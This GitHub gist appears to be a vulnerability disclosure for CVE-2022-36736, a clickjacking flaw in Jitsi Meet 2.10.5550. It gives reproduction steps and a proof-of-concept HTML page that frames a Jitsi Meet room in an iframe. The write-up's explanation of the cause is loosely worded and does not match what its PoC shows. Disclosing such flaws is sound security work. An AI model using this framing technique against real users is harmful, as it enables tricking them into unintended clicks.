Skip to content

Instantly share code, notes, and snippets.

@UditChavda
Last active September 8, 2022 10:01
Show Gist options
  • Save UditChavda/a42e0031a02c39f7508c8e1a15da6069 to your computer and use it in GitHub Desktop.
Save UditChavda/a42e0031a02c39f7508c8e1a15da6069 to your computer and use it in GitHub Desktop.
CVE-2022-36736
> Product: Jitsi Meet
> CVE : CVE-2022-36736
> version: jitsi-2.10.5550
> Vulnerability : Improper Restriction of Rendered UI Layers or Frames
> Vulnerability Description : A vulnerability in the web UI of Jitsi meet could allow an unauthenticated, remote attacker to affect the integrity of a device via a clickjacking attack. The vulnerability is due to insufficient input validation of iFrame data in HTTP requests that are sent to an affected application. An attacker could exploit this vulnerability by sending crafted HTTP packets with malicious iFrame data. A successful exploit could allow the attacker to perform a clickjacking attack where the user is tricked into clicking a malicious link.
> #Steps to Reproduce
>
> 1). Create a html file with <anyname>
> 2). Select your target Jitsi Meet code
> 2). Put This code <iframe src="https://meet.jit.si/<code>" height="550px" width="700px"></iframe>
> 3). Now save the file and launch on the browser.
> Note:- code is generated when meet is hosted.
> [Affected Product Code Base]
> jitsi for Windows - jitsi-2.10.5550.exe
> jitsi for MAC - jitsi-2.10.5550.dmg
> Jitsi for Ubuntu - jitsi_2.10.5550-1_amd64.deb
> All Jitsi different build - version 2.10
> PoC:
>
> <!DOCTYPE HTML>
> <html lang="en-US">
> <head>
> <meta charset="UTF-8">
> <title>I Frame</title>
> </head>
> <body>
> <h3>UI Redressing vulnerability</h3>
> <iframe src="https://meet.jit.si/<code>" height="550px" width="700px"></iframe>
> </body>
> </html>
> [Reference]
> http://jitsi.com
> https://meet.jit.si/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment